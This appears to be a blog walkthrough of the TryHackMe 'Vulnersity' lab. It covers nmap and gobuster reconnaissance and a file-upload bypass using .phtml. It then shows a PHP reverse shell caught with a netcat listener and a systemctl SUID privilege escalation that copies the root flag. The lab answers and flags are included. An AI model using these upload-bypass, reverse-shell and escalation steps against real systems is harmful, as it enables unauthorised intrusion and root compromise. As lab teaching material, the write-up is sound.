Open in app

Sign in

Write

Sign in

THM — Vulnersity

Yikai
9 min readNov 12, 2020

Reconnaissance

Nmap scan

kali@kali:~$ nmap -T4 -A 10.10.215.50
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-12 03:12 EST
Nmap scan report for 10.10.215.50
Host is up (0.35s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
|   256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_  256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open  http-proxy  Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Vuln University
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m13s, median: 0s
|_nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: vulnuniversity
|   NetBIOS computer name: VULNUNIVERSITY\x00
|   Domain name: \x00
|   FQDN: vulnuniversity
|_  System time: 2020-11-12T03:13:29-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-11-12T08:13:29
|_  start_date: N/AService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.06 seconds

Scan the box, how many ports are open?

Ans: 6

What version of the squid proxy is running on the machine?

Ans: 3.5.12

How many ports will nmap scan if the flag -p-400 was used?

Ans: 400

Using the nmap flag -n what will it not resolve?

Check your map manual: $ man nmap

Ans: DNS

What is the most likely operating system this machine is running?

Ans: Ubuntu ****************

What port is the web server running on?

Ans: 3333

Locating directories using GoBuster

Before using or while scanning using GoBuster, we can check the IP address with the web browser. Remember to add port 3333 after the IP address like this as the webserver is hosted on that port:

<ip add>:3333

By entering the IP add, we can view a website of Vulnersity.

Let’s get back to the GoBuster scan.

Usually, I will add some extensions with the -x flag to include in the scan.

$ gobuster dir -u 10.10.215.50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt

Results of the scan.

kali@kali:~$ gobuster dir -u http://10.10.215.50:3333/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.215.50:3333/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html,txt
[+] Timeout:        10s
===============================================================
2020/11/12 03:42:50 Starting gobuster
===============================================================
/images (Status: 301)
/index.html (Status: 200)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/internal (Status: 301)

What is the directory that has an upload form page?

So by checking each directory we will find out that the /internal has an upload form page.

Ans: /internal/

Compromise the webserver

We can try to manually upload different file types to test.

Or we can use burpsuite to fuzz the upload form.

Check this link on how to set up the burp proxy.

You could also use foxyproxy to change proxy settings as I do.

Now, at the upload form page, turn on burp proxy. Open burpsuite.

Upload a file and hit the submit button.

Go to burpsuite and check the intercept tab under the proxy tab.

You should see a POST request as shown below.

Next, right click and click send to intruder.

At the intruder/Positions tab, hit the clear button to clear all the default selected payload positions. Make sure the attack type is set to sniper.

Next, highlight the file extension and click add, to add a single payload position.

Go to the Payloads tab.

At the payload options [simple list]. Add in the following extensions by entering it in the Add bar:

php
php3
php4
php5
phtml

You could also create a text file, add in these extensions, and then click the load button.

Once you have added these extensions, you can click the start attack button on the top right.

You can check the result by clicking on the response of each payload.

Other than the phtml extension, the other extensions should have a message “Extension not allowed.”

But when you click on phtml payload response, it should show a message “Success”.

With this, we now know that the file extension .phtml can be uploaded to the upload form page.

Next, we will be using a PHP reverse shell as our payload from here.

Go to the link given by the THM box, and copy the raw PHP code. Paste the code in a text file and named it php-reverse-shell.phtml. The important thing is that the extension must be “.phtml”.

Input your THM VPN IP address. Change the IP address in the shellcode.phtml file.

Changed the IP address to your THM VPN IP. The IP address is you, the attacker’s machine, which you are trying to make the victim’s machine connect back to.

Change the port number you want to connect to, in my case I changed it to port 2222.

Run this command next: $ nc -nvlp 2222

This is to use netcat and listen for any incoming connection through port 2222.

kali@kali:~$ nc -nvlp 2222
listening on [any] 2222 ...

Go back to the upload page and upload the php-reverse-shell.phtml.

Now, you need to find where the file have been uploaded to be able to execute the reverse shell code.

Since we know the the current directory to upload the file is at http://<BoxIP>:3333/internal/ , let’s do another gobuster scan to find other hidden directory from /internal directory.

Note that my IP address changed, as my THM box expired and have to re-deploy a new box to continue.

kali@kali:~$ gobuster dir -u http://10.10.80.30:3333/internal/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.80.30:3333/internal/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html,txt
[+] Timeout:        10s
===============================================================
2020/11/12 08:03:39 Starting gobuster
===============================================================
/index.php (Status: 200)
/uploads (Status: 301)
/css (Status: 301)

From the scan we see an interesting directory /uploads .

By going to the http://<BoxIP>/internal/uploads, we can see our php-reverse-shell.phtml there.

Go ahead and click the file you have uploaded, and you should see some response from netcat showing that someone is connecting to you.

kali@kali:~$ nc -nvlp 2222
listening on [any] 2222 ...
connect to [10.4.2.142] from (UNKNOWN) [10.10.80.30] 59532
Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 08:16:35 up 46 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ pwd
/
$ ls
bin
boot
dev
etc
home
initrd.img
lib
lib64
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var
vmlinuz
$ cd home
$ ls
bill
$

What is the name of the user who manages the webserver?

Ans: Bill

$ cd bill
$ ls
user.txt
$ cat user.txt
8bd7992fbe8a6ad22a63361004cfcedb

What is the user flag?

Ans:8bd7992fbe8a6ad22a63361004cfcedb

Privilege Escalation

You can search for SUID files with the command:find / -perm -u=s -type f 2>/dev/null

$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/ping
/bin/fusermount
/sbin/mount.cifs

On the system, search for all SUID files. What file stands out?

Ans: /bin/systemctl

We can head to gtfobins to find out the possible exploit for /bin/systemctl with SUID bit here.

Based on the code from gtfobins, there are some amendments made.

TF=$(mktemp).service
echo ‘[Service]
Type=oneshot
ExecStart=/bin/sh -c “cat /root/root.txt> /tmp/output”
[Install]
WantedBy=multi-user.target’ > $TF
/bin/systemctl link $TF
/bin/systemctl enable — now $TF

Let’s break down what this code is trying to do.

TF=$(mktemp).service

The first line uses the command mktemp, basically this command is used to create a temporary file or directory with a unique file name.

The .service makes the file a service unit. Here we are creating a new service unit with a unique name.

Then the unit we created is assigned to the variable TF. Can be any name you want.

Read more about mktemp here.

Read more about creating system service unit in Linux here.

echo ‘[Service]

In the above command you see that there is a single quote after the echo command. If you do not close it with another single quote, you can actually enter many lines of input until you close it off.

Below I show a short example of how it works:

kali@kali:~$ echo '
> Hello World
> Testing
> I feel good
> let us end this'Hello World
Testing
I feel good
let us end this

So basically anything that is between the double quotes of the echo command are inputs ready to echo out.

echo ‘[Service]
Type=oneshot
ExecStart=/bin/sh -c “cat /root/root.txt> /tmp/output”
[Install]
WantedBy=multi-user.target’ > $TF

So the above commands that is in bold will be echoed and output into the TF variable.

Let’s look at what we are actually trying to echo in TF variable.

[Service]
Type=oneshot
ExecStart=/bin/sh -c “cat /root/root.txt > /tmp/output”

Service is one of the section of a .service file.

In this section we are able to specify the type of service, in this case we specified oneshot as the type of service.

ExecStart is used to specify what commands to execute when a service starts.

/bin/sh -c The -c option basically tell the shell to execute all the commands of the string inside of the quotes.

"cat /root/root.txt > /tmp/output” So when the service starts it will execute the cat command and cat out whatever is in the root.txt file and output that to a file named “output”.

[Install]
WantedBy=multi-user.target

Install is one of the section of a .service file.

WantedBy=multi-user.target This command here is to state the runlevels for the service.

/bin/systemctl link $TF
/bin/systemctl enable — now $TF

/bin/systemctl link $TF If the unit file is not in the unit file search path, it will link this unit file which is assigned to the variable TF to the unit file search path.

/bin/systemctl enable — now $TF To enable the unit file. More information for both the systemctl options can be found using the command: man systemctl

Next, we execute the commands.

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
/bin/sh: 14: GNU: not found
$ $ > > > > $ Created symlink from /etc/systemd/system/tmp.bMLjkcXxtC.service to /tmp/tmp.bMLjkcXxtC.service.
$ Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.bMLjkcXxtC.service to /tmp/tmp.bMLjkcXxtC.service.

We cd into the /tmp folder and you will find an file named “output”.

Cat it and you will get the flag.

$ cd /tmp
$ ls
output
systemd-private-cf589689c86e47e4a25d75a00d073d0f-systemd-timesyncd.service-kqhVWw
tmp.0bGYjSINSS
tmp.0bGYjSINSS.service
tmp.0vQo3HbZdD
tmp.bMLjkcXxtC
tmp.bMLjkcXxtC.service
tmp.sQtoqPg4jK
tmp.sQtoqPg4jK.service
tmp.xGP32zCZ15
tmp.xGP32zCZ15.service
Tryhackme

--

--

Yikai

Written by Yikai

51 Followers

Started my journey in cybersecurity on September 2020. This blog is used mainly to record my learning journey.

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams